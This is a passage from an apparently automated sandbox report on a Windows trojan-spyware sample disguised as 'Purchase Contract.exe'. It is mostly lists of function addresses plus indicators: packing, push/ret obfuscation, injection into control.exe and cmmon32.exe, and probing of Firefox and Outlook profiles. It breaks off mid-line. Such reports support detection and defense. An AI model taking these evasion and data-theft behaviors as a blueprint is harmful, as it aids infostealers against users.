0_2_010A0640 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_010A1D3A 0_2_010A1D3A Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E547E 3_2_044E547E Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044C740C 3_2_044C740C Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044D1410 3_2_044D1410 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0456F42B 3_2_0456F42B Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0457DCC5 3_2_0457DCC5 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_045744EF 3_2_045744EF Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04582C9A 3_2_04582C9A Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04581C9F 3_2_04581C9F Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04573490 3_2_04573490 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044B0D40 3_2_044B0D40 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04582519 3_2_04582519 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04571D1B 3_2_04571D1B Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0455C53F 3_2_0455C53F Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044D1530 3_2_044D1530 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0457D5D2 3_2_0457D5D2 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0456FDDB 3_2_0456FDDB Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04561DE3 3_2_04561DE3 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0457E581 3_2_0457E581 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0455E58A 3_2_0455E58A Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044D7640 3_2_044D7640 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E4E61 3_2_044E4E61 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0457CE66 3_2_0457CE66 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E5E70 3_2_044E5E70 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E6611 3_2_044E6611 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_045826F8 3_2_045826F8 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04573E96 3_2_04573E96 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044D8740 3_2_044D8740 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04581746 3_2_04581746 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04581FCE 3_2_04581FCE Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044B67D0 3_2_044B67D0 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04572782 3_2_04572782 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044D5790 3_2_044D5790 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0453A860 3_2_0453A860 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E1070 3_2_044E1070 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0457D016 3_2_0457D016 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E9810 3_2_044E9810 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044EE020 3_2_044EE020 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E0021 3_2_044E0021 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E48CB 3_2_044E48CB Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_045828E8 3_2_045828E8 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044CA080 3_2_044CA080 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_045618B6 3_2_045618B6 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E594B 3_2_044E594B Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04509906 3_2_04509906 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044D9110 3_2_044D9110 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E7110 3_2_044E7110 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_045761DF 3_2_045761DF Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044D81E0 3_2_044D81E0 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_045819E2 3_2_045819E2 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E6180 3_2_044E6180 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0458D9BE 3_2_0458D9BE Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E4A5B 3_2_044E4A5B Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0458E214 3_2_0458E214 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04570A02 3_2_04570A02 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E523D 3_2_044E523D Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_045822DD 3_2_045822DD Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_04581A99 3_2_04581A99 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044D42B0 3_2_044D42B0 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044DFB40 3_2_044DFB40 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044D8B00 3_2_044D8B00 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E63C2 3_2_044E63C2 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044BEBE0 3_2_044BEBE0 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_044E4B96 3_2_044E4B96 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0297AAE2 3_2_0297AAE2 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_029678F0 3_2_029678F0 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_029678EB 3_2_029678EB Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06216611 13_2_06216611 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06214E61 13_2_06214E61 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062ACE66 13_2_062ACE66 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06215E70 13_2_06215E70 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06207640 13_2_06207640 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062A3E96 13_2_062A3E96 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062B26F8 13_2_062B26F8 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06208740 13_2_06208740 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062B1746 13_2_062B1746 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062A2782 13_2_062A2782 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06205790 13_2_06205790 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_061E67D0 13_2_061E67D0 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062B1FCE 13_2_062B1FCE Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0629F42B 13_2_0629F42B Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_061F740C 13_2_061F740C Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06201410 13_2_06201410 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0621547E 13_2_0621547E Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062B2C9A 13_2_062B2C9A Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062B1C9F 13_2_062B1C9F Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062A3490 13_2_062A3490 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062A44EF 13_2_062A44EF Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062ADCC5 13_2_062ADCC5 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06201530 13_2_06201530 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0628C53F 13_2_0628C53F Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062A1D1B 13_2_062A1D1B Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062B2519 13_2_062B2519 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_061E0D40 13_2_061E0D40 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0628E58A 13_2_0628E58A Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062AE581 13_2_062AE581 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06291DE3 13_2_06291DE3 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0629FDDB 13_2_0629FDDB Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062AD5D2 13_2_062AD5D2 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0621523D 13_2_0621523D Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062A0A02 13_2_062A0A02 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062BE214 13_2_062BE214 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06214A5B 13_2_06214A5B Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062042B0 13_2_062042B0 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062B1A99 13_2_062B1A99 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062B22DD 13_2_062B22DD Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06208B00 13_2_06208B00 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0620FB40 13_2_0620FB40 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06214B96 13_2_06214B96 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062163C2 13_2_062163C2 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_061EEBE0 13_2_061EEBE0 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06210021 13_2_06210021 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0621E020 13_2_0621E020 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06219810 13_2_06219810 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062AD016 13_2_062AD016 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0626A860 13_2_0626A860 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06211070 13_2_06211070 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_061FA080 13_2_061FA080 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062918B6 13_2_062918B6 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062B28E8 13_2_062B28E8 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062148CB 13_2_062148CB Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06239906 13_2_06239906 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06209110 13_2_06209110 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06217110 13_2_06217110 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0621594B 13_2_0621594B Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062BD9BE 13_2_062BD9BE Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_06216180 13_2_06216180 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062081E0 13_2_062081E0 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062B19E2 13_2_062B19E2 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_062A61DF 13_2_062A61DF Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_03020BC9 13_2_03020BC9 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_03020640 13_2_03020640 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_03021C88 13_2_03021C88 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_03021D3A 13_2_03021D3A Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E944EF 14_2_04E944EF Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E9DCC5 14_2_04E9DCC5 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EA2C9A 14_2_04EA2C9A Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EA1C9F 14_2_04EA1C9F Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E93490 14_2_04E93490 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E0547E 14_2_04E0547E Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E8F42B 14_2_04E8F42B Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DF1410 14_2_04DF1410 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DE740C 14_2_04DE740C Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E81DE3 14_2_04E81DE3 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E8FDDB 14_2_04E8FDDB Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E9D5D2 14_2_04E9D5D2 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E9E581 14_2_04E9E581 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E7E58A 14_2_04E7E58A Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DD0D40 14_2_04DD0D40 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E7C53F 14_2_04E7C53F Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DF1530 14_2_04DF1530 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E91D1B 14_2_04E91D1B Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EA2519 14_2_04EA2519 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EA26F8 14_2_04EA26F8 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E93E96 14_2_04E93E96 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E04E61 14_2_04E04E61 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E9CE66 14_2_04E9CE66 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E05E70 14_2_04E05E70 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DF7640 14_2_04DF7640 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E06611 14_2_04E06611 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DD67D0 14_2_04DD67D0 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EA1FCE 14_2_04EA1FCE Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DF5790 14_2_04DF5790 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E92782 14_2_04E92782 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DF8740 14_2_04DF8740 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EA1746 14_2_04EA1746 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EA28E8 14_2_04EA28E8 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E048CB 14_2_04E048CB Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DEA080 14_2_04DEA080 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E818B6 14_2_04E818B6 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E5A860 14_2_04E5A860 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E01070 14_2_04E01070 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E0E020 14_2_04E0E020 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E00021 14_2_04E00021 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E09810 14_2_04E09810 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E9D016 14_2_04E9D016 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EA19E2 14_2_04EA19E2 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E961DF 14_2_04E961DF Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DF81E0 14_2_04DF81E0 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EAD9BE 14_2_04EAD9BE Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E06180 14_2_04E06180 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E0594B 14_2_04E0594B Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DF9110 14_2_04DF9110 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E29906 14_2_04E29906 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E07110 14_2_04E07110 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EA22DD 14_2_04EA22DD Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DF42B0 14_2_04DF42B0 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EA1A99 14_2_04EA1A99 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E04A5B 14_2_04E04A5B Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E0523D 14_2_04E0523D Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E90A02 14_2_04E90A02 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04EAE214 14_2_04EAE214 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E063C2 14_2_04E063C2 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DDEBE0 14_2_04DDEBE0 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E04B96 14_2_04E04B96 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DFFB40 14_2_04DFFB40 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04DF8B00 14_2_04DF8B00 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C278EB 14_2_00C278EB Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C278F0 14_2_00C278F0 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C3AAE2 14_2_00C3AAE2
 Found potential string decryption / allocating functions Show sources
 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: String function: 0623DDE8 appears 50 times Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: String function: 061EB0E0 appears 176 times Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: String function: 06275110 appears 78 times Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0450DDE8 appears 50 times Source: C:\Windows\SysWOW64\control.exe Code function: String function: 044BB0E0 appears 176 times Source: C:\Windows\SysWOW64\control.exe Code function: String function: 04545110 appears 78 times Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: String function: 05DE5110 appears 50 times Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: String function: 05D5B0E0 appears 176 times Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: String function: 05DADDE8 appears 50 times Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04E65110 appears 78 times Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04E2DDE8 appears 50 times Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04DDB0E0 appears 176 times
 Sample file is different than original file name gathered from version info Show sources
 Source: Purchase Contract.exe, 00000000.00000002.821337419.0000000005FDF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Contract.exe Source: Purchase Contract.exe, 00000000.00000000.765245970.0000000000AAA000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWindowsFormsApp2.exeF vs Purchase Contract.exe Source: Purchase Contract.exe, 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamepjzKElRfvzoP.exe4 vs Purchase Contract.exe Source: Purchase Contract.exe, 00000000.00000002.809580346.00000000011A0000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Purchase Contract.exe Source: Purchase Contract.exe, 00000000.00000003.807640474.000000000125C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Purchase Contract.exe Source: Purchase Contract.exe, 00000000.00000002.812742881.0000000005280000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Purchase Contract.exe Source: Purchase Contract.exe Binary or memory string: OriginalFilenameWindowsFormsApp2.exeF vs Purchase Contract.exe
 Searches the installation path of Mozilla Firefox Show sources
 Source: C:\Windows\SysWOW64\control.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory Jump to behavior
 Yara signature match Show sources
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3) Show sources
 Source: Purchase Contract.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ Source: updategtmlg.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/10@28/7
 Creates files inside the user directory Show sources
 Source: C:\Users\user\Desktop\Purchase Contract.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Contract.exe.log Jump to behavior
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_01 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3024:120:WilError_01
 Creates temporary files Show sources
 Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\S-zzxp Jump to behavior
 PE file has an executable .text section and no other executable section Show sources
 Source: Purchase Contract.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using the .NET runtime (Probably coded in C#) Show sources
 Reads ini files Show sources
 Reads software policies Show sources
 Source: C:\Users\user\Desktop\Purchase Contract.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
 Reads the hosts file Show sources
 Sample is known by Antivirus Show sources
 Source: Purchase Contract.exe Virustotal: Detection: 32% Source: Purchase Contract.exe ReversingLabs: Detection: 45%
 Spawns processes Show sources
 Uses an in-process (OLE) Automation server Show sources
 Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
 Writes ini files Show sources
 Source: C:\Windows\SysWOW64\control.exe File written: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.ini Jump to behavior
 Uses Microsoft Silverlight Show sources
 Source: C:\Users\user\Desktop\Purchase Contract.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
 Checks if Microsoft Office is installed Show sources
 Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
 PE file contains a COM descriptor data directory Show sources
 Source: Purchase Contract.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Contains modern PE file flags such as dynamic base (ASLR) or NX Show sources
 Source: Purchase Contract.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols Show sources
 Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.784714178.0000000007010000.00000002.00000001.sdmp Source: Binary string: cmmon32.pdb source: updategtmlg.exe, 0000000D.00000002.1172851048.0000000005790000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000003.1178323049.0000000000730000.00000004.00000001.sdmp Source: Binary string: cmmon32.pdbGCTL source: updategtmlg.exe, 0000000D.00000002.1172851048.0000000005790000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000003.1178323049.0000000000730000.00000004.00000001.sdmp Source: Binary string: control.pdb source: Purchase Contract.exe, 00000000.00000002.809957748.000000000125B000.00000004.00000001.sdmp Source: Binary string: wntdll.pdbUGP source: Purchase Contract.exe, 00000000.00000002.814464607.0000000005D30000.00000040.00000001.sdmp, control.exe, 00000003.00000002.2008031582.00000000045AF000.00000040.00000001.sdmp, updategtmlg.exe, 0000000D.00000002.1174356895.00000000062DF000.00000040.00000001.sdmp, cmmon32.exe, 0000000E.00000002.1171387497.0000000004ECF000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000002.1185902885.0000000005340000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.1184353663.0000000004910000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: Purchase Contract.exe, control.exe, updategtmlg.exe, cmmon32.exe, updategtmlg.exe, 0000000F.00000002.1185902885.0000000005340000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.1184353663.0000000004910000.00000040.00000001.sdmp Source: Binary string: control.pdbUGP source: Purchase Contract.exe, 00000000.00000002.809957748.000000000125B000.00000004.00000001.sdmp Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.784714178.0000000007010000.00000002.00000001.sdmp

#### Data Obfuscation:

 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_00A62AC2 push eax; ret 0_2_00A62AC3 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05DADE2D push ecx; ret 0_2_05DADE40 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0450DE2D push ecx; ret 3_2_0450DE40 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_02979A82 push eax; ret 3_2_02979A88 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_02979A8B push eax; ret 3_2_02979AF2 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_029652F9 pushfd ; retf 3_2_029652EA Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_02979AEC push eax; ret 3_2_02979AF2 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_029652E9 pushfd ; retf 3_2_029652EA Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0296521A push esi; iretd 3_2_02965226 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_02979A35 push eax; ret 3_2_02979A88 Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0296D9CD push ds; retf 3_2_0296D9CE Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_00EE2AC2 push eax; ret 13_2_00EE2AC3 Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0623DE2D push ecx; ret 13_2_0623DE40 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E2DE2D push ecx; ret 14_2_04E2DE40 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C2D9CD push ds; retf 14_2_00C2D9CE Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C252E9 pushfd ; retf 14_2_00C252EA Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C39AEC push eax; ret 14_2_00C39AF2 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C252F9 pushfd ; retf 14_2_00C252EA Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C39A82 push eax; ret 14_2_00C39A88 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C39A8B push eax; ret 14_2_00C39AF2 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C2521A push esi; iretd 14_2_00C25226 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C39A35 push eax; ret 14_2_00C39A88 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C33BEB push 